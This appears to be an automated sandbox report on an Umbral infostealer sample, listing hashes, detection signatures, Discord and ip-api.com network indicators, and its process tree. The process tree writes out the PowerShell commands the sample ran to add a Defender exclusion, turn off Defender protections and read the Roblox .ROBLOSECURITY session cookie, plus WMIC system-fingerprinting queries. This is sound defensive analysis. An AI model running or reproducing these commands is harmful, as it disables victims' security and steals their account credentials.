Analysis

- max time kernel: 1565s
- max time network: 1567s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 07-06-2024 19:22
Behavioral task

- Behavioral task: behavioral1
- Sample: TEST.exe
- Resource: win7-20240215-en
General

- Target: TEST.exe
- Size: 229KB
- MD5: 9dc985d83754309760ae45747d8081c2
- SHA1: b60e1c39ee8da20c5bdf1df501fab12fd45eaf50
- SHA256: f3fdf0137c30af49a71a174e204795a0b96ef2a8a0a53fda4add34574f79005b
- SHA512: d0908c5e493bd83cd58e73b715c9318cb6032bb388d7c6ffbdc75b4bb813e594153a57e2ecebbe0a2d1aa0513312be16886b08ad8b91fc590217838057a730cf
- SSDEEP: 6144:tloZM+rIkd8g+EtXHkv/iD4hYBSGELnsmd42X3WVzb8e1mzi:voZtL+EP8hYBSGELnsmd42X3WtB
Malware Config
Signatures
- Detect Umbral payload (1 IoC)

  | resource | yara_rule |
  | --- | --- |
  | behavioral1/memory/2952-1-0x0000000000BA0000-0x0000000000BE0000-memory.dmp | family_umbral |

- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  | pid | Process |
  | --- | --- |
  | 1736 | powershell.exe |

- Drops file in Drivers directory (1 IoC)

  | description | ioc | Process |
  | --- | --- | --- |
  | File opened for modification | C:\Windows\System32\drivers\etc\hosts | TEST.exe |

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

  | flow | ioc |
  | --- | --- |
  | 8 | discord.com |
  | 9 | discord.com |

- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.

  | flow | ioc |
  | --- | --- |
  | 6 | ip-api.com |

- Detects videocard installed (1 TTP, 1 IoC)
  Uses WMIC.exe to determine the videocard installed.

  | pid | Process |
  | --- | --- |
  | 2828 | wmic.exe |

- Suspicious behavior: EnumeratesProcesses (5 IoCs)

  | pid | Process |
  | --- | --- |
  | 1736 | powershell.exe |
  | 1284 | powershell.exe |
  | 2484 | powershell.exe |
  | 3004 | powershell.exe |
  | 2772 | powershell.exe |
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Each row lists, in report order, the consecutive token entries recorded for one process; the 2988 wmic.exe set is recorded twice.

  | pid | Process | Token(s) |
  | --- | --- | --- |
  | 2952 | TEST.exe | SeDebugPrivilege |
  | 1736 | powershell.exe | SeDebugPrivilege |
  | 1284 | powershell.exe | SeDebugPrivilege |
  | 2484 | powershell.exe | SeDebugPrivilege |
  | 3004 | powershell.exe | SeDebugPrivilege |
  | 2988 | wmic.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 |
  | 2988 | wmic.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 |
  | 1748 | wmic.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34 |
- Suspicious use of WriteProcessMemory (27 IoCs)

  | description | pid | Process | procid_target |
  | --- | --- | --- | --- |
  | PID 2952 wrote to memory of 1736 | 2952 | TEST.exe | 28 |
  | PID 2952 wrote to memory of 1736 | 2952 | TEST.exe | 28 |
  | PID 2952 wrote to memory of 1736 | 2952 | TEST.exe | 28 |
  | PID 2952 wrote to memory of 1284 | 2952 | TEST.exe | 30 |
  | PID 2952 wrote to memory of 1284 | 2952 | TEST.exe | 30 |
  | PID 2952 wrote to memory of 1284 | 2952 | TEST.exe | 30 |
  | PID 2952 wrote to memory of 2484 | 2952 | TEST.exe | 32 |
  | PID 2952 wrote to memory of 2484 | 2952 | TEST.exe | 32 |
  | PID 2952 wrote to memory of 2484 | 2952 | TEST.exe | 32 |
  | PID 2952 wrote to memory of 3004 | 2952 | TEST.exe | 34 |
  | PID 2952 wrote to memory of 3004 | 2952 | TEST.exe | 34 |
  | PID 2952 wrote to memory of 3004 | 2952 | TEST.exe | 34 |
  | PID 2952 wrote to memory of 2988 | 2952 | TEST.exe | 36 |
  | PID 2952 wrote to memory of 2988 | 2952 | TEST.exe | 36 |
  | PID 2952 wrote to memory of 2988 | 2952 | TEST.exe | 36 |
  | PID 2952 wrote to memory of 1748 | 2952 | TEST.exe | 39 |
  | PID 2952 wrote to memory of 1748 | 2952 | TEST.exe | 39 |
  | PID 2952 wrote to memory of 1748 | 2952 | TEST.exe | 39 |
  | PID 2952 wrote to memory of 2424 | 2952 | TEST.exe | 41 |
  | PID 2952 wrote to memory of 2424 | 2952 | TEST.exe | 41 |
  | PID 2952 wrote to memory of 2424 | 2952 | TEST.exe | 41 |
  | PID 2952 wrote to memory of 2772 | 2952 | TEST.exe | 43 |
  | PID 2952 wrote to memory of 2772 | 2952 | TEST.exe | 43 |
  | PID 2952 wrote to memory of 2772 | 2952 | TEST.exe | 43 |
  | PID 2952 wrote to memory of 2828 | 2952 | TEST.exe | 45 |
  | PID 2952 wrote to memory of 2828 | 2952 | TEST.exe | 45 |
  | PID 2952 wrote to memory of 2828 | 2952 | TEST.exe | 45 |
Processes

- C:\Users\Admin\AppData\Local\Temp\TEST.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\TEST.exe"
  PID: 2952
  - Drops file in Drivers directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  Child processes (spawned by PID 2952):

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TEST.exe'
    PID: 1736
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    PID: 1284
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    PID: 2484
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    PID: 3004
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" os get Caption
    PID: 2988
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" computersystem get totalphysicalmemory
    PID: 1748
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" csproduct get uuid
    PID: 2424

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    PID: 2772
    - Suspicious behavior: EnumeratesProcesses

  - C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic" path win32_VideoController get name
    PID: 2828
    - Detects videocard installed
Network
MITRE ATT&CK Enterprise v15
Downloads

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DGZQ2Y6PYIYSZ92PJIC.temp
  Filesize: 7KB
  MD5: d96f8f282a204615d3e05e1ea32c6b54
  SHA1: 502838561e7452c4fd62320b7e48954670b2f247
  SHA256: ca8c5d9dd9d54c688e7b3fc6e8a79710ded88fe2eb7e3098b32c562fde7c2969
  SHA512: a99b96fc32d52d8bfae92706e4dc2e691401d9aff805520f7a3d05d87947f8f4322c0ab2cd100c31fd5827eff55da34b3983a7b83c3bc5f57551df386b910507